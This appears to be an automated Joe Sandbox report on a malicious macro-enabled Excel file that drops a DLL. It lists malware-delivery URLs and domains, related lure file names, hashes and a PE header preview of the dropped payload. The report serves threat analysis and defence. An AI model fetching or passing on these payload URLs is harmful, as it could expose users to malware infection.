                                                                                                                                                                                  Overall analysis duration:0h 6m 45s
                                                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                                                  Report type:full
                                                                                                                                                                                  Sample file name:Vac.list07-20214862208.xlsm
                                                                                                                                                                                  Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                                                  Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                                                                                                                  Number of analysed new started processes analysed:6
                                                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                                                  Technologies:
                                                                                                                                                                                  • HCA enabled
                                                                                                                                                                                  • EGA enabled
                                                                                                                                                                                  • HDC enabled
                                                                                                                                                                                  • AMSI enabled
                                                                                                                                                                                  Analysis Mode:default
                                                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                                                  Detection:MAL
                                                                                                                                                                                  Classification:mal100.troj.expl.evad.winXLSM@7/4@7/5
                                                                                                                                                                                  EGA Information:Failed
                                                                                                                                                                                  HDC Information:
                                                                                                                                                                                  • Successful, ratio: 70.6% (good quality ratio 56.6%)
                                                                                                                                                                                  • Quality average: 70.2%
                                                                                                                                                                                  • Quality standard deviation: 40%
                                                                                                                                                                                  HCA Information:
                                                                                                                                                                                  • Successful, ratio: 77%
                                                                                                                                                                                  • Number of executed functions: 12
                                                                                                                                                                                  • Number of non-executed functions: 3
                                                                                                                                                                                  Cookbook Comments:
                                                                                                                                                                                  • Adjust boot time
                                                                                                                                                                                  • Enable AMSI
                                                                                                                                                                                  • Found application associated with file extension: .xlsm
                                                                                                                                                                                  • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                                                  • Attach to Office via COM
                                                                                                                                                                                  • Scroll down
                                                                                                                                                                                  • Close Viewer
                                                                                                                                                                                  Warnings:
                                                                                                                                                                                  Show All
                                                                                                                                                                                  • Exclude process from analysis (whitelisted): dllhost.exe
                                                                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                                                  Simulations

                                                                                                                                                                                  Behavior and APIs

                                                                                                                                                                                  No simulations

                                                                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                                                                  IPs

                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                  172.67.198.51List-4527768.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                  • thousandsyears.download/div/44376,8555986111.jpg
                                                                                                                                                                                  HRcontacts7752205.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                  • thousandsyears.download/div/44376,8555986111.jpg
                                                                                                                                                                                  sbf0127365-7431059.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                  • thousandsyears.download/div/44376,8555986111.jpg
                                                                                                                                                                                  Outfordelivery799862.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                  • thousandsyears.download/div/44376,8555986111.jpg
                                                                                                                                                                                  Purchaseconfirmation-137606.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                  • thousandsyears.download/div/44376,8555986111.jpg
                                                                                                                                                                                  DeliveryConf535215.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                  • thousandsyears.download/div/44376,8555986111.jpg
                                                                                                                                                                                  PI-210610.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                  • thousandsyears.download/div/44376,8555986111.jpg
                                                                                                                                                                                  143.204.91.74f6718e02bc73edf5aab341fa0a7f75782bc72f7dd1a6e.dllGet hashmaliciousBrowse
                                                                                                                                                                                    8f9b032ff6f56a685f4c6f9eb57784811d6c98aa83b0c.dllGet hashmaliciousBrowse
                                                                                                                                                                                      718421.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        paxi1.dllGet hashmaliciousBrowse
                                                                                                                                                                                          7hu4M2hAe7.dllGet hashmaliciousBrowse
                                                                                                                                                                                            lQsa52UcOF.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                              b8c033482291a3c073483fc23df165d39fd79c6f22144.dllGet hashmaliciousBrowse
                                                                                                                                                                                                jLyCpYVr6p.dllGet hashmaliciousBrowse
                                                                                                                                                                                                  E7D5105D3408A45C1003172B9A1AA3A1E60F7AC6E07E8.dllGet hashmaliciousBrowse
                                                                                                                                                                                                    BA6D707A66005C28EA843C2F7623AF7B7B09B1C02FCF0.dllGet hashmaliciousBrowse
                                                                                                                                                                                                      3AC49BC78F8FCB40EEA7016B3319401AF6CF19149586E.dllGet hashmaliciousBrowse
                                                                                                                                                                                                        104.21.37.209HRcontacts7752205.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                        • astrocycle.download/
                                                                                                                                                                                                        Formtofill4184860.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                        • astrocycle.download/
                                                                                                                                                                                                        Outfordelivery799862.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                        • astrocycle.download/
                                                                                                                                                                                                        Purchaseconfirmation-137606.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                        • astrocycle.download/
                                                                                                                                                                                                        DeliveryConf535215.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                        • astrocycle.download/
                                                                                                                                                                                                        172.67.146.88List-4527768.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                        • uppercilio.fun/div/44376,8555986111.jpg
                                                                                                                                                                                                        Formtofill4184860.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                        • uppercilio.fun/div/44376,8555986111.jpg

                                                                                                                                                                                                        Domains

                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                                        voopeople.funList-4527768.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                        • 172.67.194.117
                                                                                                                                                                                                        HRcontacts7752205.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                        • 172.67.194.117
                                                                                                                                                                                                        Formtofill4184860.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                        • 172.67.194.117
                                                                                                                                                                                                        sbf0127365-7431059.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                        • 104.21.12.122
                                                                                                                                                                                                        Outfordelivery799862.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                        • 172.67.194.117
                                                                                                                                                                                                        Purchaseconfirmation-137606.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                        • 172.67.194.117
                                                                                                                                                                                                        DeliveryConf535215.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                        • 172.67.194.117
                                                                                                                                                                                                        PI-210610.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                        • 172.67.194.117
                                                                                                                                                                                                        thousandsyears.downloadList-4527768.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                        • 172.67.198.51
                                                                                                                                                                                                        HRcontacts7752205.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                        • 172.67.198.51
                                                                                                                                                                                                        Formtofill4184860.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                        • 104.21.52.111
                                                                                                                                                                                                        sbf0127365-7431059.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                        • 172.67.198.51
                                                                                                                                                                                                        Outfordelivery799862.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                        • 172.67.198.51
                                                                                                                                                                                                        Purchaseconfirmation-137606.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                        • 172.67.198.51
                                                                                                                                                                                                        DeliveryConf535215.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                        • 172.67.198.51
                                                                                                                                                                                                        PI-210610.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                        • 172.67.198.51
                                                                                                                                                                                                        dr49lng3n1n2s.cloudfront.netList-4527768.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                        • 13.225.75.73
                                                                                                                                                                                                        HRcontacts7752205.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                        • 13.225.75.73
                                                                                                                                                                                                        Formtofill4184860.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                        • 13.225.75.73
                                                                                                                                                                                                        sbf0127365-7431059.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                        • 13.224.92.73
                                                                                                                                                                                                        Outfordelivery799862.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                        • 13.224.92.73
                                                                                                                                                                                                        Purchaseconfirmation-137606.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                        • 13.224.92.73
                                                                                                                                                                                                        DeliveryConf535215.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                        • 13.224.92.73
                                                                                                                                                                                                        PI-210610.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                        • 143.204.4.74
                                                                                                                                                                                                        f6718e02bc73edf5aab341fa0a7f75782bc72f7dd1a6e.dllGet hashmaliciousBrowse
                                                                                                                                                                                                        • 143.204.91.74
                                                                                                                                                                                                        8f9b032ff6f56a685f4c6f9eb57784811d6c98aa83b0c.dllGet hashmaliciousBrowse
                                                                                                                                                                                                        • 143.204.91.74
                                                                                                                                                                                                        718421.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                        • 143.204.91.74
                                                                                                                                                                                                        Ln11IgJVUM.dllGet hashmaliciousBrowse
                                                                                                                                                                                                        • 13.225.75.73
                                                                                                                                                                                                        6c710694d270db91b550daf3177622514d2444e7484fb.dllGet hashmaliciousBrowse
                                                                                                                                                                                                        • 13.225.75.73
                                                                                                                                                                                                        SOAOG31JdG.dllGet hashmaliciousBrowse
                                                                                                                                                                                                        • 13.225.75.73
                                                                                                                                                                                                        QEiuTX6cTw.dllGet hashmaliciousBrowse
                                                                                                                                                                                                        • 143.204.91.74
                                                                                                                                                                                                        YiIS9HvO21.dllGet hashmaliciousBrowse
                                                                                                                                                                                                        • 13.32.16.68
                                                                                                                                                                                                        xDxD5fLpPC.dllGet hashmaliciousBrowse
                                                                                                                                                                                                        • 52.222.157.68
                                                                                                                                                                                                        YiIS9HvO21.dllGet hashmaliciousBrowse
                                                                                                                                                                                                        • 52.222.157.68
                                                                                                                                                                                                        AQvfg6cfsH.dllGet hashmaliciousBrowse
                                                                                                                                                                                                        • 52.222.157.68
                                                                                                                                                                                                        1hIvIzTHG5.dllGet hashmaliciousBrowse
                                                                                                                                                                                                        • 52.222.157.68
                                                                                                                                                                                                        uppercilio.funList-4527768.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                        • 172.67.146.88
                                                                                                                                                                                                        HRcontacts7752205.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                        • 104.21.55.83
                                                                                                                                                                                                        Formtofill4184860.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                        • 172.67.146.88
                                                                                                                                                                                                        sbf0127365-7431059.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                        • 104.21.55.83
                                                                                                                                                                                                        Outfordelivery799862.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                        • 104.21.55.83
                                                                                                                                                                                                        Purchaseconfirmation-137606.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                        • 104.21.55.83
                                                                                                                                                                                                        DeliveryConf535215.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                        • 104.21.55.83
                                                                                                                                                                                                        PI-210610.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                        • 104.21.55.83
                                                                                                                                                                                                        astrocycle.downloadList-4527768.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                        • 172.67.213.115
                                                                                                                                                                                                        HRcontacts7752205.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                        • 172.67.213.115
                                                                                                                                                                                                        Formtofill4184860.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                        • 104.21.37.209
                                                                                                                                                                                                        sbf0127365-7431059.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                        • 172.67.213.115
                                                                                                                                                                                                        Outfordelivery799862.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                        • 104.21.37.209
                                                                                                                                                                                                        Purchaseconfirmation-137606.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                        • 172.67.213.115
                                                                                                                                                                                                        DeliveryConf535215.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                        • 172.67.213.115
                                                                                                                                                                                                        PI-210610.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                        • 172.67.213.115

                                                                                                                                                                                                        ASN

                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                                        CLOUDFLARENETUSList-4527768.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                        • 172.67.194.117
                                                                                                                                                                                                        HRcontacts7752205.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                        • 172.67.194.117
                                                                                                                                                                                                        Formtofill4184860.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                        • 172.67.194.117
                                                                                                                                                                                                        sbf0127365-7431059.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                        • 104.21.12.122
                                                                                                                                                                                                        runsys32.dllGet hashmaliciousBrowse
                                                                                                                                                                                                        • 104.20.185.68
                                                                                                                                                                                                        Outfordelivery799862.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                        • 172.67.194.117
                                                                                                                                                                                                        Purchaseconfirmation-137606.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                        • 172.67.194.117
                                                                                                                                                                                                        DeliveryConf535215.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                        • 172.67.194.117
                                                                                                                                                                                                        SMR8OzIgNB.exeGet hashmaliciousBrowse
                                                                                                                                                                                                        • 104.21.8.151
                                                                                                                                                                                                        Follow up Purchase order num- 4500262450.exeGet hashmaliciousBrowse
                                                                                                                                                                                                        • 104.21.75.42
                                                                                                                                                                                                        PI-210610.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                        • 172.67.194.117
                                                                                                                                                                                                        2790000.dllGet hashmaliciousBrowse
                                                                                                                                                                                                        • 104.20.185.68
                                                                                                                                                                                                        2770174.dllGet hashmaliciousBrowse
                                                                                                                                                                                                        • 104.20.185.68
                                                                                                                                                                                                        Payment Invoice.exeGet hashmaliciousBrowse
                                                                                                                                                                                                        • 172.67.188.154
                                                                                                                                                                                                        rial exe.exeGet hashmaliciousBrowse
                                                                                                                                                                                                        • 104.21.19.200
                                                                                                                                                                                                        Quotation.exeGet hashmaliciousBrowse
                                                                                                                                                                                                        • 104.21.19.200
                                                                                                                                                                                                        SCTc9qaix4.exeGet hashmaliciousBrowse
                                                                                                                                                                                                        • 1.0.0.1
                                                                                                                                                                                                        AFS Co., Ltd..exeGet hashmaliciousBrowse
                                                                                                                                                                                                        • 104.26.6.41
                                                                                                                                                                                                        q7p7x4f4gX.dllGet hashmaliciousBrowse
                                                                                                                                                                                                        • 104.20.184.68
                                                                                                                                                                                                        XoN2GgRiga.exeGet hashmaliciousBrowse
                                                                                                                                                                                                        • 104.23.99.190
                                                                                                                                                                                                        AMAZON-02USList-4527768.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                        • 13.225.75.73
                                                                                                                                                                                                        HRcontacts7752205.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                        • 13.225.75.73
                                                                                                                                                                                                        Formtofill4184860.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                        • 13.225.75.73
                                                                                                                                                                                                        sbf0127365-7431059.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                        • 13.224.92.73
                                                                                                                                                                                                        Reciept 19129475.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                                        • 54.191.98.150
                                                                                                                                                                                                        Outfordelivery799862.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                        • 13.224.92.73
                                                                                                                                                                                                        Purchaseconfirmation-137606.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                        • 13.224.92.73
                                                                                                                                                                                                        DeliveryConf535215.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                        • 13.224.92.73
                                                                                                                                                                                                        PI-210610.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                        • 143.204.4.74
                                                                                                                                                                                                        GDTGz3GXCiNgYwtXT6qX3tY8eu8Mqj.msiGet hashmaliciousBrowse
                                                                                                                                                                                                        • 18.231.168.212
                                                                                                                                                                                                        39d0c1e7.msiGet hashmaliciousBrowse
                                                                                                                                                                                                        • 3.143.159.48
                                                                                                                                                                                                        Movcy_v1.0.0.apkGet hashmaliciousBrowse
                                                                                                                                                                                                        • 52.39.180.2
                                                                                                                                                                                                        order No. 00192099##001 pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                                        • 3.143.65.214
                                                                                                                                                                                                        f6718e02bc73edf5aab341fa0a7f75782bc72f7dd1a6e.dllGet hashmaliciousBrowse
                                                                                                                                                                                                        • 143.204.91.74
                                                                                                                                                                                                        lZYIQJNUsZ.exeGet hashmaliciousBrowse
                                                                                                                                                                                                        • 13.249.12.162
                                                                                                                                                                                                        q62NZgHtRq.exeGet hashmaliciousBrowse
                                                                                                                                                                                                        • 3.22.53.161
                                                                                                                                                                                                        iGet hashmaliciousBrowse
                                                                                                                                                                                                        • 52.9.197.152
                                                                                                                                                                                                        8zsiEeSTzI.exeGet hashmaliciousBrowse
                                                                                                                                                                                                        • 52.217.140.209
                                                                                                                                                                                                        Request For Quotation.exeGet hashmaliciousBrowse
                                                                                                                                                                                                        • 75.2.26.18
                                                                                                                                                                                                        pip install.yp.exeGet hashmaliciousBrowse
                                                                                                                                                                                                        • 52.18.63.80

                                                                                                                                                                                                        JA3 Fingerprints

                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                                        05af1f5ca1b87cc9cc9b25185115607dList-4527768.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                        • 143.204.91.74
                                                                                                                                                                                                        HRcontacts7752205.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                        • 143.204.91.74
                                                                                                                                                                                                        Formtofill4184860.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                        • 143.204.91.74
                                                                                                                                                                                                        sbf0127365-7431059.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                        • 143.204.91.74
                                                                                                                                                                                                        Outfordelivery799862.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                        • 143.204.91.74
                                                                                                                                                                                                        Purchaseconfirmation-137606.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                        • 143.204.91.74
                                                                                                                                                                                                        DeliveryConf535215.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                        • 143.204.91.74
                                                                                                                                                                                                        PI-210610.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                        • 143.204.91.74
                                                                                                                                                                                                        108020075.exeGet hashmaliciousBrowse
                                                                                                                                                                                                        • 143.204.91.74
                                                                                                                                                                                                        G-DECL G50 EURL.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                                        • 143.204.91.74
                                                                                                                                                                                                        1.docGet hashmaliciousBrowse
                                                                                                                                                                                                        • 143.204.91.74
                                                                                                                                                                                                        DECL G50 EURL!.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                                        • 143.204.91.74
                                                                                                                                                                                                        Order No. 211128.docGet hashmaliciousBrowse
                                                                                                                                                                                                        • 143.204.91.74
                                                                                                                                                                                                        SOA.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                                        • 143.204.91.74
                                                                                                                                                                                                        DECL G50 EURL.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                                        • 143.204.91.74
                                                                                                                                                                                                        WO 378871.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                                        • 143.204.91.74
                                                                                                                                                                                                        Order 824126.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                                        • 143.204.91.74
                                                                                                                                                                                                        WO 378871.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                                        • 143.204.91.74
                                                                                                                                                                                                        PO 31449213.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                                        • 143.204.91.74
                                                                                                                                                                                                        Order 161488.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                                        • 143.204.91.74

                                                                                                                                                                                                        Dropped Files

                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fmlList-4527768.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                          HRcontacts7752205.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                            Formtofill4184860.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                              sbf0127365-7431059.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                Outfordelivery799862.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                  Purchaseconfirmation-137606.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                    DeliveryConf535215.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                      PI-210610.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                        C:\Users\user\XTOWN.dllList-4527768.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                          HRcontacts7752205.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                            Formtofill4184860.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                              sbf0127365-7431059.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                                Outfordelivery799862.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                                  Purchaseconfirmation-137606.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                                    DeliveryConf535215.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                                      PI-210610.xlsmGet hashmaliciousBrowse

                                                                                                                                                                                                                                        Created / dropped Files

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fml
                                                                                                                                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (native) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):57856
                                                                                                                                                                                                                                        Entropy (8bit):4.963425128586394
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:wIZpbT9PDZE0ix9i33yS6AII5QiyWaTeQC9m6ny96/eQponqM:wypbTax9IyeIGhaaN9Hny962TnqM
                                                                                                                                                                                                                                        MD5:7A1D163990ACE9CEF1D43831866109AB
                                                                                                                                                                                                                                        SHA1:38A40E5AF9912C2935F74F2085D810A24325DC2A
                                                                                                                                                                                                                                        SHA-256:2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8
                                                                                                                                                                                                                                        SHA-512:454FBFD2C7BC18F47B02D67CA957D01A86E09EE4F4C6CAADF2CDF981478E90467C2B3BE750C293790016EB5AED757E8553FD2CB65242FB6C0D0E3A231291F247
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Joe Sandbox View:
                                                                                                                                                                                                                                        • Filename: List-4527768.xlsm, Detection: malicious, Browse
                                                                                                                                                                                                                                        • Filename: HRcontacts7752205.xlsm, Detection: malicious, Browse
                                                                                                                                                                                                                                        • Filename: Formtofill4184860.xlsm, Detection: malicious, Browse
                                                                                                                                                                                                                                        • Filename: sbf0127365-7431059.xlsm, Detection: malicious, Browse
                                                                                                                                                                                                                                        • Filename: Outfordelivery799862.xlsm, Detection: malicious, Browse
                                                                                                                                                                                                                                        • Filename: Purchaseconfirmation-137606.xlsm, Detection: malicious, Browse
                                                                                                                                                                                                                                        • Filename: DeliveryConf535215.xlsm, Detection: malicious, Browse
                                                                                                                                                                                                                                        • Filename: PI-210610.xlsm, Detection: malicious, Browse
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........M.M.M.>...N.M.K.M.I...L...L.RichM.........PE..d......`.........." .....:.......... .....................................................`.....................................................(....................................................................................P..@............................text...(8.......:.................. ..`.rdata..~....P.......>..............@..@.data...`...........................@....pdata..............................@..@........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\55CFCD6F.png
                                                                                                                                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                                        File Type:PNG image data, 1600 x 1600, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):174009
                                                                                                                                                                                                                                        Entropy (8bit):7.967231122944825
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:4DusrJcGUAUpF2e/RIiZmxjTH0Fq2yIyJFZqcN+KCiSsYErzSK/XO:CRcGUlFzy4mpTHdrUc3/SsYASj
                                                                                                                                                                                                                                        MD5:C0AF15BAE70AFFC4BE7625110AEEF09A
                                                                                                                                                                                                                                        SHA1:AEF94E038F0538C812AAF9EF605F76AF2376A26D
                                                                                                                                                                                                                                        SHA-256:D2F5852B2EF010150C0C8A980F25B715C6363A8C4454C711B9E9F2B2532F1657
                                                                                                                                                                                                                                        SHA-512:131DECBB06F1CE1A049BBF25B49615320FB4DC6DF5D3DA8B44EAE455D6ACC8AE12981BC108431DCC01D21EABFE1A552581C508F57FD3FDB7D7B06B5346522B2B
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview: .PNG........IHDR...@...@.......~.....PLTE.....3..f..........+..+3.+f.+..+..+..U..U3.Uf.U..U..U......3..f..............3..f..............3..f.............3..f.........3..3.33.f3..3..3..3+.3+33+f3+.3+.3+.3U.3U33Uf3U.3U.3U.3..3.33.f3..3..3..3..3.33.f3..3..3..3..3.33.f3.3..3..3..3.33.f3..3..3..f..f.3f.ff..f..f..f+.f+3f+ff+.f+.f+.fU.fU3fUffU.fU.fU.f..f.3f.ff..f..f..f..f.3f.ff..f..f..f..f.3f.ff.f..f..f..f.3f.ff..f..f.......3..f.........+..+3.+f.+..+.+..U..U3.Uf.U..U.U......3..f.............3..f.............3..f............3..f.............3..f..........+..+3.+f.+..+..+..U..U3.Uf.U..U..U....3.f.........3.f...........3..f.............3..f..............3..f..........+..+3.+f.+..+..+..U..U3.Uf.U..U..U......3..f..............3..f..............3..f.............3..f........................(....tRNS...................................................................................................................................................................................
                                                                                                                                                                                                                                        C:\Users\user\Desktop\~$Vac.list07-20214862208.xlsm
                                                                                                                                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):165
                                                                                                                                                                                                                                        Entropy (8bit):1.4377382811115937
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                                                                                                                                                                                                                        MD5:797869BB881CFBCDAC2064F92B26E46F
                                                                                                                                                                                                                                        SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                                                                                                                                                                                                                        SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                                                                                                                                                                                                                        SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:high, very likely benign file
                                                                                                                                                                                                                                        Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                                                                        C:\Users\user\XTOWN.dll
                                                                                                                                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (native) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):57856
                                                                                                                                                                                                                                        Entropy (8bit):4.963425128586394
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:wIZpbT9PDZE0ix9i33yS6AII5QiyWaTeQC9m6ny96/eQponqM:wypbTax9IyeIGhaaN9Hny962TnqM
                                                                                                                                                                                                                                        MD5:7A1D163990ACE9CEF1D43831866109AB
                                                                                                                                                                                                                                        SHA1:38A40E5AF9912C2935F74F2085D810A24325DC2A
                                                                                                                                                                                                                                        SHA-256:2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8
                                                                                                                                                                                                                                        SHA-512:454FBFD2C7BC18F47B02D67CA957D01A86E09EE4F4C6CAADF2CDF981478E90467C2B3BE750C293790016EB5AED757E8553FD2CB65242FB6C0D0E3A231291F247
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Joe Sandbox View:
                                                                                                                                                                                                                                        • Filename: List-4527768.xlsm, Detection: malicious, Browse
                                                                                                                                                                                                                                        • Filename: HRcontacts7752205.xlsm, Detection: malicious, Browse
                                                                                                                                                                                                                                        • Filename: Formtofill4184860.xlsm, Detection: malicious, Browse
                                                                                                                                                                                                                                        • Filename: sbf0127365-7431059.xlsm, Detection: malicious, Browse
